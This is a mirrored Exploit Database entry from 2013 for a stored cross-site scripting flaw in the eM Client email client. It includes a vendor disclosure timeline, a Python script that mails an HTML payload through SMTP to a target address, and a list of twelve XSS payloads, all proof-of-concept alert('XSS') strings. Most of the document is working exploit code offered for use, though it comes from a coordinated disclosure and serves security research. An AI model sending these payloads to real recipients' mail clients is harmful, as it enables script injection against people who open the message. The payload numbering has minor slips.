eM Client e-mail client 5.0.18025.0 – Persistent Cross-Site Scripting

• Exploit Database
• 16 阅读

• 作者： loneferret
  日期： 2013-09-10
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/28183/

• #!/usr/bin/python
  '''
  
  Author: loneferret of Offensive Security
  Date: 22-08-2013
  Product: eM Client for Windows
  Version: 5.0.18025.0 (previous versions and other platforms may be vulnerable)
  Vendor Site: http://www.emclient.com/
  Software Download: http://www.emclient.com/download
  
  Tested on: Windows XP Pro SP3 Eng.
  Tested on: Windows 7 Pro SP1 Eng.
  eM Client: Using default settings
  
  
  E-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you 
  get an annoying alert box etc etc etc.
  Injection Point:Body
   
  Gave vendor 7 days to reply in order to co-ordinate a release date. 
  Timeline:
  23 Aug 2013: Tentative release date 30 Aug 2013
  23 Aug 2013: Vulnerability reported to vendor. Provided a list of payloads
  26 Aug 2013: No response from vendor, sent a reminder email
  27 Aug 2013: Vendor responded, will issue update to fix within 14 days
  27 Aug 2013: Tentative release date pushed to September 10th 2013
  27 Aug 2013: Replied to vendor with new date
  09 Sep 2013: Contacted vendor with remainder of release date
  09 Sep 2013: Vendor responded with go ahead with release
  10 Sep 2013: Public release
  
  Solution: Upgrade/update to latest version (haven't tested yet)
  
  '''
  
  import smtplib, urllib2
  
  payload = '''<DIV STYLE="background-image: url(javascript:alert('XSS'))">'''
  
  def sendMail(dstemail, frmemail, smtpsrv, username, password):
  msg= "From: hacker@offsec.local\n"
  msg += "To: victim@offsec.local\n"
  msg += 'Date: Today\r\n'
  msg += "Subject: XSS payload\n"
  msg += "Content-type: text/html\n\n"
  msg += payload + "\r\n\r\n"
  server = smtplib.SMTP(smtpsrv)
  server.login(username,password)
  try:
  server.sendmail(frmemail, dstemail, msg)
  except Exception, e:
  print "[-] Failed to send email:"
  print "[*] " + str(e)
  server.quit()
  
  username = "test@test.com"
  password = "123456"
  dstemail = "test@test.com"
  frmemail = "hacker@offsec.local"
  smtpsrv= "172.16.61.165"
  
  print "[*] Sending Email"
  sendMail(dstemail, frmemail, smtpsrv, username, password)
  
  '''
  # Payloads
  [+] Payload 1 : DIV background-image 1
  [+] Code for 1 : <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  ------------
  [+] Payload 2 : DIV background-image 2
  [+] Code for 2 : <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
  ------------
  [+] Payload 3 : DIV expression
  [+] Code for 3 : <DIV STYLE="width: expression(alert('XSS'));">
  ------------
  [+] Payload 4 : IMG STYLE w/expression
  [+] Code for 4 : exp/*<XSS STYLE='no\xss:noxss("*//*");
  xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
  ------------
  [+] Payload 5 : List-style-image
  [+] Code for 5 : <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
  ------------
  [+] Payload 6 : STYLE w/Comment
  [+] Code for 6 : <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  ------------
  [+] Payload 7 : STYLE w/Anonymous HTML
  [+] Code for 7 : <XSS STYLE="xss:expression(alert('XSS'))">
  ------------
  [+] Payload 8 : STYLE w/background-image
  [+] Code for 8 : <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  ------------
  [+] Payload 9 : TABLE
  [+] Code for 9 : <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
  ------------
  [+] Payload 10 : TD
  [+] Code for 11 : <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
  ------------
  [+] Payload 12 : Commented-out Block
  [+] Code for 12 : <!--[if gte IE 4]>
  <SCRIPT>alert('XSS');</SCRIPT>
  <![endif]-->
  ----
  '''